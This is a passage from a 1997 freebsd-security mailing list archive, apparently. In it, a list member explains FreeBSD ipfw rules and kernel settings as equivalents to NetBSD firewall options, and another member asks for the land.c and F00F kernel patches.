Department of Computer Science  |    analog:  503-690-1265
PO Box 91000                    |    digital: crispin@cse.ogi.edu
Portland, OR 97291-1000         |    URL:     http://www.cse.ogi.edu/~crispin/
        Knowledge is to Wisdom as Data is to Code

-----End of forwarded message-----

--
-[ Philippe Regnauld / sysadmin / regnauld@deepo.prosa.dk / +55.4N +11.3E ]-
  "Pluto placed his bad dog at the entrance of Hades to keep the dead IN
   and the living OUT! The archetypical corporate firewall?" - S.
   Kelly Bootle, about Cerberus ["MYTHOLOGY", in Marutukku distrib] -

From owner-freebsd-security Fri Dec 19 07:38:52 1997
Return-Path:
Received: (from root@localhost) by hub.freebsd.org (8.8.7/8.8.7) id HAA24248 for security-outgoing; Fri, 19 Dec 1997 07:38:52 -0800 (PST) (envelope-from owner-freebsd-security)
Received: from passer.osg.gov.bc.ca (passer.osg.gov.bc.ca [142.32.110.29]) by hub.freebsd.org (8.8.7/8.8.7) with ESMTP id HAA24240 for ; Fri, 19 Dec 1997 07:38:49 -0800 (PST) (envelope-from cy@cschuber.net.gov.bc.ca)
Received: (from uucp@localhost) by passer.osg.gov.bc.ca (8.8.8/8.6.10) id HAA19837; Fri, 19 Dec 1997 07:38:42 -0800 (PST)
Received: from cschuber.net.gov.bc.ca(142.31.240.113), claiming to be "cwsys.cwsent.com" via SMTP by passer.osg.gov.bc.ca, id smtpdaaEnaa; Fri Dec 19 07:38:36 1997
Received: (from uucp@localhost) by cwsys.cwsent.com (8.8.8/8.6.10) id HAA00996; Fri, 19 Dec 1997 07:38:18 -0800 (PST)
Message-Id: <199712191538.HAA00996@cwsys.cwsent.com>
Received: from localhost.cwsent.com(127.0.0.1), claiming to be "cwsys" via SMTP by localhost.cwsent.com, id smtpd000987; Fri Dec 19 15:38:00 1997
X-Mailer: exmh version 2.0zeta 7/24/97
Reply-to: Cy Schubert - ITSD Open Systems Group
From: Cy Schubert - ITSD Open Systems Group
X-Sender: cy
To: Adam Shostack
cc: firewall-wizards@nfr.net (Firewall Wizards List), freebsd-security@freebsd.org
Subject: Re: Kernel options for FW?
In-reply-to: Your message of "Thu, 18 Dec 1997 11:15:02 EST." <199712181615.LAA14478@homeport.org>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Date: Fri, 19 Dec 1997 07:37:59 -0800
Sender: owner-freebsd-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

> (This is not meant to spark a religious war. I'm asking for help
> configuring a kernel, and comparing kernel security features between
> FreeBSD and NetBSD to make a reasonable decision.)
>
> On Netbsd, I'd enable the following options. I can't find equivilents
> to these on FreeBSD.
> Do they exist, and what are they? Also, I know
> Freebsd sets kernel security wrong (-1) by default, and that needs to
> be fixed. Are there other things that I should know about on Freebsd
> to do everything right?
>
>
> options IPFORWSRCRT=0           //Turn off source routing.

Under FreeBSD you would use,

        ipfw deny ... ipoptions ssrr
        ipfw deny ... ipoptions lsrr
        ipfw deny ... ipoptions rr

>
> options IPNOPRIVPORTS           //Remove concept of priv'd ports so BIND doesn't
>                                 //need to run as root.

There is no equivalent in FreeBSD-stable. I'm not sure whether -current
has it.

>
> options IPFILTER_DEFAULT_BLOCK  //Put my FW policy in the kernel.

The FreeBSD default is BLOCK and is defined as rule 65535. If you wish to
make the default PASS, then you'd define rule 65534 with the pass option.

>
> options FDSCRIPTS               // Allow a script to be run if it is x only, by
>                                 // passing a file descriptor to the interpreter,
>                                 // avoiding some race conditions.

I'm not sure that I understand, but I'll attempt to answer it anyway.
Using divert sockets you can divert packets to an arbitrary piece of
code, e.g. NAT. To set up a divert socket you would use the divert option
of ipfw.

>
> Adam
>
> --
> "It is seldom that liberty of any kind is lost all at once."
>                                                -Hume
>
>

Regards,                       Phone:  (250)387-8437
Cy Schubert                    Fax:    (250)387-5766
UNIX Support                   OV/VM:  BCSC02(CSCHUBER)
ITSD                           BITNET: CSCHUBER@BCSC02.BITNET
Government of BC               Internet: cschuber@uumail.gov.bc.ca
                                         Cy.Schubert@gems8.gov.bc.ca

                "Quit spooling around, JES do it."
From owner-freebsd-security Fri Dec 19 16:14:57 1997
Return-Path:
Received: (from root@localhost) by hub.freebsd.org (8.8.7/8.8.7) id QAA04514 for security-outgoing; Fri, 19 Dec 1997 16:14:57 -0800 (PST) (envelope-from owner-freebsd-security)
Received: from freebsd.coffeehaus.net (qmailr@freebsd.coffeehaus.net [146.115.119.6]) by hub.freebsd.org (8.8.7/8.8.7) with SMTP id QAA04498 for ; Fri, 19 Dec 1997 16:14:53 -0800 (PST) (envelope-from jkowall@coffeehaus.net)
Received: (qmail 549 invoked from network); 20 Dec 1997 00:14:32 -0000
Received: from freebsd.coffeehaus.net (jkowall@146.115.119.6) by freebsd.coffeehaus.net with SMTP; 20 Dec 1997 00:14:32 -0000
Date: Fri, 19 Dec 1997 19:14:32 -0500 (EST)
From: Jonah Kowall
To: freebsd-security@freebsd.org
Subject: land.c patch for 2.2.5-RELEASE
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

Does anyone have the "final" patch released, as well as the final F00F
patch for the kernel. Sorry to bother you busy bees, but I am in
desperate need of the land patch asap.

Thanks guys for all the interesting discussions I am able to enjoy!

- Jonah Kowall
  VP Technology
  Coffeehaus Networks / Content Advisor
  Somerville, MA